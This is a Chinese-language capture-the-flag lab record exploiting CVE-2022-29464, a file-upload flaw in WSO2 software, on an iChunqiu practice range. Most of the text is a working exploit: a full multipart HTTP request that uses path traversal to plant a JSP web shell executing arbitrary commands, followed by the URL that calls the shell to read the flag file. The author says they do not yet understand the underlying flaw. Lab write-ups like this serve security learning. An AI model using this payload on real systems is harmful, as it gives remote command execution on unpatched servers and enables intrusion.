春秋云境---CVE-2022-29464

# CVE-2022-29464

# 一、漏洞信息

# 二、操作记录

这里只是对该环境做操作记录，本人对该漏洞原理没整明白，后续会对该漏洞进行深入学习！！！

进入环境后，挂上 Burp，随便抓取一个数据包，使用网上提供的 POC 构造一个恶意数据包然后上传，返回包如图所示说明上传成功

POST /fileupload/toolsAny HTTP/2
Host: eci-2zebt5xpaov34rc6aa07.cloudeci1.ichunqiu.com:9445
Accept: */*
Accept-Encoding: gzip, deflate
Content-Length: 898
Content-Type: multipart/form-data; boundary=4ef9f369a86bfaadf5ec3177278d49c0
User-Agent: python-requests/2.22.0


--4ef9f369a86bfaadf5ec3177278d49c0
Content-Disposition: form-data; name="../../../../repository/deployment/server/webapps/authenticationendpoint/testshell.jsp"; filename="../../../../repository/deployment/server/webapps/authenticationendpoint/testshell.jsp"

<FORM>
    <INPUT name='cmd' type=text>
    <INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
    <%
    String cmd = request.getParameter("cmd");
    String output = "";
    if(cmd != null) {
        String s = null;
        try {
            Process p = Runtime.getRuntime().exec(cmd,null,null);
            BufferedReader sI = new BufferedReader(new
InputStreamReader(p.getInputStream()));
            while((s = sI.readLine()) != null) { output += s+"</br>"; }
        }  catch(IOException e) {   e.printStackTrace();   }
    }
%>
        <%=output %>
--4ef9f369a86bfaadf5ec3177278d49c0--

来到靶场页面，不用考虑这个登录框，直接在路径后面拼上如下内容即可获取 flag

https://eci-2zebt5xpaov34rc6aa07.cloudeci1.ichunqiu.com:9443/authenticationendpoint/testshell.jsp?cmd=cat+%2Fflag

# 三、总结

这个漏洞个人感觉不是那么好操作，因为网上有现成的 POC 所以操作起来很容易，但是难点在于对该 POC 以及漏洞原理的理解～～～

# 四、参考链接

• https://blog.csdn.net/laobanjiull/article/details/128104379
• https://packetstormsecurity.com/files/166921/WSO-Arbitrary-File-Upload-Remote-Code-Execution.html
• https://forum.butian.net/share/1518
• https://paper.seebug.org/2033/